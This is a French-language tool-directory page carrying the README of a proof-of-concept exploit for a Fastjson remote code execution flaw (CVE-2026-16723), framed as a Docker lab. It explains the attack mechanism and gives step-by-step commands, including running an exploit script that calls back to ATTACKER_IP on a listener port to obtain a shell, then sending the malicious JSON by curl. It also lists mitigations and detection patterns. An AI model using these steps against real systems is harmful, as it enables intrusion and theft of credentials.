Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-16723 — Exploit PoC pour Fastjson RCE (CVE-2026-16723) doté de la génération et de la livraison automatisées de charges utiles JAR via un JSON malveillant, contournant les restrictions AutoType. | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2026-16723
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

Exploit PoC pour Fastjson RCE (CVE-2026-16723) doté de la génération et de la livraison automatisées de charges utiles JAR via un JSON malveillant, contournant les restrictions AutoType.

Voir le dépôt
1il y a 22 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Vue d'ensemble

CVE-2026-16723 est une vulnérabilité d'exécution de code à distance (RCE) dans Fastjson 1.x (1.2.68 – 1.2.83). Lorsque Fastjson analyse un JSON contrôlé par l'attaquant, une valeur @type contrefaite est transformée en recherche de ressource de classe dans checkAutoType. Dans un fat-JAR exécutable Spring Boot, le chargeur de classe résout ce nom en tant qu'URL jar:http:// et récupère un JAR distant (SSRF), puis charge une classe portant l'annotation @JSONType même si AutoType est désactivé. Étant donné qu'un JDK / Tomcat moderne rejette le nom binaire jar:http://, la variante fiable place le JAR dans le cache de la JVM et le relit via jar:file:/proc/self/fd/N, de sorte que la classe est définie et que son initialiseur statique s'exécute, permettant l'exécution de code. AutoType reste désactivé et aucun gadget de classpath n'est requis.


Versions concernées

CatégorieVersion
VulnérableFastjson 1.2.68 ≤ version ≤ 1.2.83
CorrigéMigrer vers Fastjson 2.x (aucune version 1.x corrigée)

Impact

  • Exécution de code à distance sous le compte de service
  • Divulgation de secrets / identifiants depuis l'hôte et l'environnement
  • Compromission totale de l'application concernée

Environnement

La cible du laboratoire est une vitrine publique (Northwind Store) dont l'API de recherche lie son corps de requête avec Fastjson. Tout est la configuration par défaut de Fastjson : SafeMode désactivé, AutoType désactivé, empaqueté en fat-JAR Spring Boot.

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
PréconditionÉtat dans ce laboratoire
Fastjson 1.2.68 – 1.2.831.2.83
Fat-JAR exécutable Spring Bootoui
Chemin d'analyse JSON non authentifiéPOST /api/products/search
SafeMode / AutoTypepar défaut (tous deux désactivés)

PoC

L'attaquant et la cible s'exécutent sur le même réseau Docker bridge, donc la cible joint l'attaquant via une connexion sortante (aucun port supplémentaire n'est publié).

Étape 1. Vérifier que la cible est en ligne

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Étape 2. Lancer l'exploit sur la machine de l'attaquant

exploit.py construit le JAR de la charge utile, le sert, démarre un listener et affiche le corps de la requête. Seule l'adresse de rappel est requise.

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Étape 3. Délivrer la charge utile

Collez le corps affiché dans l'endpoint de recherche (Burp Repeater ou curl) et envoyez-le. La requête de recherche est une fonctionnalité normale ; seul son corps JSON est manipulé.

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Étape 4. Confirmer le résultat

Le code s'exécute sous le compte de service. Récupérez le flag via le shell obtenu :

root@kitploit:~
whoami

Atténuation

  • Migrer vers Fastjson 2.x
  • Ou exécuter com.alibaba:fastjson:1.2.83_noneautotype
  • Ou démarrer la JVM avec -Dfastjson.parser.safeMode=true
  • Détection : valeurs JSON @type contenant des motifs jar:http ou jar:file / /proc/self/fd

Analyse

  • KR:
  • EN:
Télécharger l’outil